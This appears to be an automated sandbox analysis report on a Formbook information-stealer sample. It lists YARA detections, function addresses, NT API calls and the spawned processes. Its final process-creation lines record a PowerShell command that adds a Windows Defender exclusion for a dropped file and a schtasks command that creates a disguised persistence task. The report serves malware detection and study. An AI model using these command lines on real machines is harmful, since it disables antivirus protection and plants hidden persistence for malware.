Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.iuvRyl9i7D.exe.2e5276c.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_0096BA77	0_2_0096BA77
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_01344139	0_2_01344139
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_01344148	0_2_01344148
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_0134EDF0	0_2_0134EDF0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_0134EDE0	0_2_0134EDE0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_0134DA1C	0_2_0134DA1C
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_075D4713	0_2_075D4713
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_075D85C0	0_2_075D85C0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_075D0040	0_2_075D0040
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_075D7970	0_2_075D7970
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_075D18D8	0_2_075D18D8
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_075D0006	0_2_075D0006
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_07841398	0_2_07841398
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_0784B848	0_2_0784B848
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_07840F61	0_2_07840F61
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_07840F70	0_2_07840F70
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_07842580	0_2_07842580
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 0_2_0784256F	0_2_0784256F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 8_2_002FBA77	8_2_002FBA77
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_00401030	12_2_00401030
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0040927B	12_2_0040927B
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_00409280	12_2_00409280
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0040DC20	12_2_0040DC20
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_00402D8F	12_2_00402D8F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_00402D90	12_2_00402D90
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0041D78F	12_2_0041D78F
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_00402FB0	12_2_00402FB0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0041E7BB	12_2_0041E7BB
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0059BA77	12_2_0059BA77
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AD466	21_2_046AD466
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045F841F	21_2_045F841F
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B1D55	21_2_046B1D55
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B2D07	21_2_046B2D07
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045E0D20	21_2_045E0D20
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B25DD	21_2_046B25DD
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FD5E0	21_2_045FD5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04612581	21_2_04612581
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04606E30	21_2_04606E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046AD616	21_2_046AD616
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B2EF7	21_2_046B2EF7
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B1FF1	21_2_046B1FF1
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046BDFCE	21_2_046BDFCE
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046BE824	21_2_046BE824
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A830	21_2_0460A830
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A1002	21_2_046A1002
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B28EC	21_2_046B28EC
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046120A0	21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B20A8	21_2_046B20A8
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045FB090	21_2_045FB090
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04604120	21_2_04604120
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_045EF900	21_2_045EF900
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046099BF	21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0469FA2B	21_2_0469FA2B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B22AE	21_2_046B22AE
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460AB40	21_2_0460AB40
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046B2B28	21_2_046B2B28
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0460A309	21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046A03DA	21_2_046A03DA
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046ADBD2	21_2_046ADBD2
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461ABD8	21_2_0461ABD8
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0461EBB0	21_2_0461EBB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0060927B	21_2_0060927B
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_00609280	21_2_00609280
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0060DC20	21_2_0060DC20
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_00602D8F	21_2_00602D8F
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_00602D90	21_2_00602D90
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_00602FB0	21_2_00602FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0061E7BB	21_2_0061E7BB

Source: C:\Windows\SysWOW64\control.exe

Code function: String function: 045EB150 appears 87 times

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0041A310 NtCreateFile,	12_2_0041A310
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0041A3C0 NtReadFile,	12_2_0041A3C0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0041A440 NtClose,	12_2_0041A440
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0041A4F0 NtAllocateVirtualMemory,	12_2_0041A4F0
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Code function: 12_2_0041A30C NtCreateFile,	12_2_0041A30C
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629540 NtReadFile,LdrInitializeThunk,	21_2_04629540
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046295D0 NtClose,LdrInitializeThunk,	21_2_046295D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629660 NtAllocateVirtualMemory,LdrInitializeThunk,	21_2_04629660
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629650 NtQueryValueKey,LdrInitializeThunk,	21_2_04629650
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629610 NtEnumerateValueKey,LdrInitializeThunk,	21_2_04629610
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046296E0 NtFreeVirtualMemory,LdrInitializeThunk,	21_2_046296E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046296D0 NtCreateKey,LdrInitializeThunk,	21_2_046296D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629710 NtQueryInformationToken,LdrInitializeThunk,	21_2_04629710
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629FE0 NtCreateMutant,LdrInitializeThunk,	21_2_04629FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629780 NtMapViewOfSection,LdrInitializeThunk,	21_2_04629780
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629860 NtQuerySystemInformation,LdrInitializeThunk,	21_2_04629860
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629840 NtDelayExecution,LdrInitializeThunk,	21_2_04629840
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629910 NtAdjustPrivilegesToken,LdrInitializeThunk,	21_2_04629910
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046299A0 NtCreateSection,LdrInitializeThunk,	21_2_046299A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629A50 NtCreateFile,LdrInitializeThunk,	21_2_04629A50
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629560 NtWriteFile,	21_2_04629560
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629520 NtWaitForSingleObject,	21_2_04629520
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0462AD30 NtSetContextThread,	21_2_0462AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046295F0 NtQueryInformationFile,	21_2_046295F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629670 NtQueryInformationProcess,	21_2_04629670
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629760 NtOpenProcess,	21_2_04629760
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0462A770 NtOpenThread,	21_2_0462A770
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629770 NtSetInformationFile,	21_2_04629770
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629730 NtQueryVirtualMemory,	21_2_04629730
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0462A710 NtOpenProcessToken,	21_2_0462A710
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046297A0 NtUnmapViewOfSection,	21_2_046297A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0462B040 NtSuspendThread,	21_2_0462B040
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629820 NtEnumerateKey,	21_2_04629820
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046298F0 NtReadVirtualMemory,	21_2_046298F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046298A0 NtWriteVirtualMemory,	21_2_046298A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629950 NtQueueApcThread,	21_2_04629950
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_046299D0 NtCreateProcessEx,	21_2_046299D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629A20 NtResumeThread,	21_2_04629A20
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629A00 NtProtectVirtualMemory,	21_2_04629A00
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629A10 NtQuerySection,	21_2_04629A10
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629A80 NtOpenDirectoryObject,	21_2_04629A80
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_04629B00 NtSetValueKey,	21_2_04629B00
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0462A3B0 NtGetContextThread,	21_2_0462A3B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0061A310 NtCreateFile,	21_2_0061A310
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0061A3C0 NtReadFile,	21_2_0061A3C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0061A440 NtClose,	21_2_0061A440
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0061A4F0 NtAllocateVirtualMemory,	21_2_0061A4F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 21_2_0061A30C NtCreateFile,	21_2_0061A30C

Source: iuvRyl9i7D.exe	Binary or memory string: OriginalFilename vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.301765758.00000000075A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFort.dll" vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.294702301.0000000000962000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.296852767.0000000002E29000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFort.dll" vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000000.00000002.301821423.0000000007770000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDotNetZipAdditionalPlatforms.dllZ vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe	Binary or memory string: OriginalFilename vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 00000008.00000000.287142892.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe	Binary or memory string: OriginalFilename vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000000.292903741.0000000000592000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000002.368345516.000000000114F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000002.369531505.0000000002EC5000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCONTROL.EXEj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000002.369137494.00000000012DF000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000003.296040440.0000000000FB4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe, 0000000C.00000003.293928699.0000000000E0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs iuvRyl9i7D.exe
Source: iuvRyl9i7D.exe	Binary or memory string: OriginalFilenameSecurityContextRunD.exe* vs iuvRyl9i7D.exe

Source: iuvRyl9i7D.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: dDqpEdJEtzi.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: iuvRyl9i7D.exe	Virustotal: Detection: 23%
Source: iuvRyl9i7D.exe	ReversingLabs: Detection: 19%

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

File read: C:\Users\user\Desktop\iuvRyl9i7D.exe

Jump to behavior

Source: iuvRyl9i7D.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe "C:\Users\user\Desktop\iuvRyl9i7D.exe"
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe	Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe
